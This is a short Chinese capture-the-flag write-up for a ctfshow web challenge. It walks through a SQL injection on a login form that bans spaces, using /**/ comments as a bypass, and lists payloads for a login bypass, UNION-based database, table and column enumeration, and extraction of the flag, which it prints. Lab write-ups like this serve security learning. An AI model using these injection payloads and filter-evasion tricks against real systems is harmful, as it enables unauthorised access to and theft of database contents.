打开题目发现与web2 相似,但是尝试着用万能密码登录时显示其中存在违规字
猜测ban掉了万能密码里的其中一个字符
分析 admin' or 1=1#
试试 username=1'2&password=123
username=1#2&password=123
username=1 2&password=123
发现在有空格时出现了违规字符提示,即题目把 空格 ban 了。
接下来的步骤与web2 时极为相似,下面我会用 /**/ 代替空格
username=admin'/**/or/**/1=1#&password=123
username=admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#&password=123
username=admin'/**/or/**/1=1/**/union/**/select/**/1,database(),3#&password=123
username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#&password=123
username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#&password=123
username=admin'/**/or/**/1=1/**/union/**/select/**/1,flag/**/,3/**/from/**/flag#&password=123
得出flag ctfshow{991e587f-45f0-47fb-a66b-82342f4b5a74}